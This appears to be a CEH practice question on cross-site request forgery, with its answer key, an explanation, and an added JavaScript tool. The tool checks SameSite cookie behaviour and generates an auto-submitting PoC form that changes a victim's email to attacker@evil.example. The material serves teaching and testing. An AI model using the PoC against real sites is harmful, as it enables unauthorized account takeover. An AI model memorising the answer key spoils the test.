You also observe that none of the application's sensitive POST forms include anti-CSRF tokens. What is the most appropriate next step to confirm the likely vulnerability created by this configuration?
Inject a reflected XSS payload into a query-string parameter to attempt stealing the auth cookie.
Place time-based SQL-injection payloads inside the auth cookie value to test for blind SQL injection.
Create a proof-of-concept page on a different domain that auto-submits a sensitive POST request to the target site and observe whether the action executes while you are still logged in.
Attempt session fixation by replaying the same auth cookie after logging out and logging back in.
Because the authentication cookie is explicitly marked SameSite=None (an attribute browsers only honour when the cookie is also Secure), the browser attaches it to cross-site requests, including a top-level form POST issued from another origin. With no server-side CSRF token in the POST forms, the server has nothing that distinguishes a forged request from a legitimate one, so an attacker can craft a page that silently submits a POST while the victim is logged in. Building and hosting such a proof-of-concept page on a different origin and observing whether the state-changing action succeeds confirms a cross-site request forgery vulnerability. The other options (reflected XSS injection, session fixation, and SQL-injection payloads inside the cookie) target unrelated weaknesses and would not verify the CSRF risk created by SameSite=None combined with absent CSRF tokens.
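The following is an added example, not code from the original question page or its answer key. It models the two conditions the explanation relies on (a cookie that browsers attach to cross-site requests, and a sensitive form with no anti-CSRF token) and then generates the cross-origin auto-submitting page used to confirm the issue. The cookie line, form markup, target URL and field names are constructed placeholders, and the token-name patterns are a heuristic assumption.

```javascript
// Added example, not part of the original question page. Models the
// SameSite check and missing-token check the explanation relies on, then
// builds the cross-origin auto-submitting PoC page. All inputs below are
// constructed placeholders, not data taken from the page.

// Parse a Set-Cookie header value into { name, value, attrs }, with attribute
// names lowercased and value-less attributes (Secure, HttpOnly) set to true.
function parseSetCookie(header) {
  const parts = header.split(";").map((p) => p.trim()).filter(Boolean);
  const eq = parts[0].indexOf("=");
  const cookie = { name: parts[0].slice(0, eq).trim(), value: parts[0].slice(eq + 1), attrs: {} };
  for (const p of parts.slice(1)) {
    const i = p.indexOf("=");
    const key = (i === -1 ? p : p.slice(0, i)).trim().toLowerCase();
    cookie.attrs[key] = i === -1 ? true : p.slice(i + 1).trim();
  }
  return cookie;
}

// Will a browser attach the cookie to a cross-site request of the given kind?
// kind: "top-level-get" | "top-level-post" | "subresource" (fetch/XHR/img/iframe)
// Returns "sent", "not-sent" or "browser-dependent".
function sentCrossSite(cookie, kind) {
  const raw = cookie.attrs.samesite;
  const mode = raw === undefined ? "absent" : String(raw).toLowerCase();
  switch (mode) {
    case "none":
      // None is only honoured with Secure; modern browsers reject None without it.
      return cookie.attrs.secure === true ? "sent" : "not-sent";
    case "strict":
      return "not-sent";
    case "lax":
      // Lax rides along on top-level navigations with safe methods only.
      return kind === "top-level-get" ? "sent" : "not-sent";
    default:
      // No attribute: Chromium treats it as Lax (with a short "Lax+POST" grace
      // period for freshly set cookies); other browsers differ, so do not assume.
      return kind === "top-level-get" ? "sent" : "browser-dependent";
  }
}

// Heuristic check for a hidden anti-CSRF field in a form's markup; the name
// patterns are an assumption, so a miss should be confirmed by reading the form.
function hasCsrfToken(formHtml) {
  const inputs = formHtml.match(/<input\b[^>]*>/gi) || [];
  return inputs.some(
    (tag) =>
      /\btype\s*=\s*["']?hidden\b/i.test(tag) &&
      /\bname\s*=\s*["']?[^"'\s>]*(csrf|xsrf|token|nonce)/i.test(tag)
  );
}

// Combine both observations into the verdict the question is driving at.
function assessCsrf(setCookieHeader, formHtml) {
  const cookie = parseSetCookie(setCookieHeader);
  const cookieSent = sentCrossSite(cookie, "top-level-post");
  const tokenPresent = hasCsrfToken(formHtml);
  return { cookieSent, tokenPresent, likelyCsrf: cookieSent === "sent" && !tokenPresent };
}

// Build the proof-of-concept page: a form that POSTs the sensitive action and
// submits itself on load. Host it on a different origin and open it while
// logged in to the target; if the action executes, CSRF is confirmed.
function buildCsrfPoc(action, fields) {
  const esc = (s) => String(s).replace(/&/g, "&amp;").replace(/"/g, "&quot;").replace(/</g, "&lt;");
  const inputs = Object.entries(fields)
    .map(([k, v]) => `    <input type="hidden" name="${esc(k)}" value="${esc(v)}">`)
    .join("\n");
  return [
    "<!doctype html>",
    "<html><body>",
    `  <form id="csrf" method="POST" action="${esc(action)}">`,
    inputs,
    "  </form>",
    '  <script>document.getElementById("csrf").submit();</script>',
    "</body></html>",
  ].join("\n");
}

// Constructed sample input (placeholders, not from the page).
const SAMPLE_COOKIE = "auth=2f9c1e; Path=/; Secure; HttpOnly; SameSite=None";
const SAMPLE_FORM =
  '<form method="POST" action="/account/email"><input type="email" name="email"><button>Save</button></form>';

if (typeof require !== "undefined" && require.main === module) {
  console.log(assessCsrf(SAMPLE_COOKIE, SAMPLE_FORM));
  console.log(buildCsrfPoc("https://target.example/account/email", { email: "attacker@evil.example" }));
}
```

Save the generated page on a host that is not the target site (any static server on another hostname or port will do), open it in the browser that holds the victim session, then check whether the account change landed. A plain form POST is a "simple" request, so no CORS preflight runs and the attacker never needs to read the response; the state change on the server is the evidence. If the cookie had been Lax rather than None, the same page would fail, because Lax cookies are not attached to cross-site POSTs.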
Certified Ethical Hacker (CEH)
Web Application Hacking